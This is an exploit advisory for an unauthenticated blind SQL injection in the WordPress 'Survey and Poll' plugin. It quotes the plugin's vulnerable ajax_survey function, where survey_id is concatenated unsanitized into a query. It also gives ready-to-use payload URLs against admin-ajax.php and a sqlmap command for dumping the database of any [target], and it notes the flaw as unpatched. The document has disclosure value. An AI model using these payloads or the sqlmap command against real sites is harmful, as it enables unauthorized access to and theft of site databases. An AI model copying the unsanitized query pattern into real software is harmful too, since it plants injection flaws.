#################################################################
# Exploit Title : Wordpress Survey and poll Blind SQL Injection

# Data : 2015 – 02 - 11

# Exploit Author : Securely (Yoo Hee man)

# Plugin : WordPress Survey and Poll

# Vender Homepage : http://modalsurvey.sympies.com

# Tested On : Windows XP / sqlmap_v1.0

# Software Link : https://downloads.wordpress.org/plugin/wp-survey-and-poll.1.1.zip
                  https://downlaods.wordpress.org/plugin/wp-survey-and-poll.zip (latest version v.1.1.7 By February 11, 2015 based on)

1. Detail 
- This Plugin is passes ajax_survey function as [admin-ajax.php] a form of action and processes them in the /wp-survey-and-poll/settings.php
- Settings.php file is no login cookie check
- "survey_id" variable is not sanitized


#################################################################
public function ajax_survey()
    {
    global $wpdb;
    $survey_id = "";
    $survey_name = "";
    $survey_start_time = "";
    $survey_expiry_time = "";
    $survey_global = "";
    if (isset($_REQUEST['survey_id'])) $survey_id = sanitize_text_field($_REQUEST['survey_id']);
    else $survey_id = "";
    if (isset($_REQUEST['survey_name'])) sanitize_text_field($survey_name = $_REQUEST['survey_name']);
    else $survey_name = "";
    if (isset($_REQUEST['start_time'])&&(!empty($_REQUEST['start_time']))) $survey_start_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['start_time']));
    else $survey_start_time = "";
    if (isset($_REQUEST['expiry_time'])&&(!empty($_REQUEST['expiry_time']))) $survey_expiry_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['expiry_time']));
    else $survey_expiry_time = "";
    if (isset($_REQUEST['global_use'])) $survey_global = sanitize_text_field($_REQUEST['global_use']);
    else $survey_global = "";
    if (isset($_REQUEST['options'])) $survey_options = sanitize_text_field($_REQUEST['options']);
    else $survey_options = "";
    if (isset($_REQUEST['qa'])) $survey_qa = sanitize_text_field($_REQUEST['qa']);
    else $survey_qa = "";
    $survey_check = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."wp_sap_surveys WHERE `id` = ".$survey_id);
    if ($_REQUEST['sspcmd']=="save")
    {
    if ($survey_check>0) {
    //update survey
      $wpdb->update( $wpdb->prefix."wp_sap_surveys", array( "options" => $survey_options, "start_time" => $survey_start_time, 'expiry_time' => $survey_expiry_time, 'global' => $survey_global),array('id' => $survey_id));
      $wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_questions WHERE `survey_id` = %d",$survey_id));
      $wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_answers WHERE `survey_id` = %d",$survey_id));
        $qa_object = (array)json_decode(stripslashes($survey_qa));
        $qa_array = (array)$qa_object;
        foreach($qa_array as $keyq=>$qr)
        {
          foreach($qr as $key=>$oa)
          {
            if ($key==0)
            {
            $wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
              'id' => ($keyq+1), 
              'survey_id' => $survey_id, 
              'question' => $oa
              ) );
              $qid = $wpdb->insert_id;
            }
            else
            {
            $oans = explode("->",$oa);
            $wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
              'survey_id' => $survey_id, 
              'question_id' => ($keyq+1),
              'answer' => $oans[0],
              'count' => $oans[1],
              'autoid' => $key
              ) );          
            }
          
          }
        }
      die("updated");
    }
    else {
    //insert survey
      $wpdb->insert( $wpdb->prefix."wp_sap_surveys", array( 
        'id' => $survey_id, 
        'name' => $survey_name, 
        'options' => $survey_options, 
        'start_time' => $survey_start_time,
        'expiry_time'=> $survey_expiry_time,
        'global'=> $survey_global
        ) );
        $qa_object = (array)json_decode(stripslashes($survey_qa));
        $qa_array = (array)$qa_object;
        foreach($qa_array as $keyq=>$qr)
        {
          foreach($qr as $key=>$oa)
          {
            if ($key==0)
            {
            $wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
              'id' => ($keyq+1), 
              'survey_id' => $survey_id, 
              'question' => $oa
              ) );
              $qid = $wpdb->insert_id;
            }
            else
            {
            $oans = explode("->",$oa);
            $wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
              'survey_id' => $survey_id, 
              'question_id' => ($keyq+1),
              'answer' => $oans[0],
              'autoid' => $key
              ) );          
            }
          
          }
        }
      die('success');
    }
################################################################

2. POC
- http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498 [SQLi]
- DataBase() => "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>[Numbers compare]

3. Sqlmap
- sqlmap -u "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql


3. Solution:
Not patched

4. Discovered By : Securely(Yoo Hee man)
                   god2zuzu@naver.com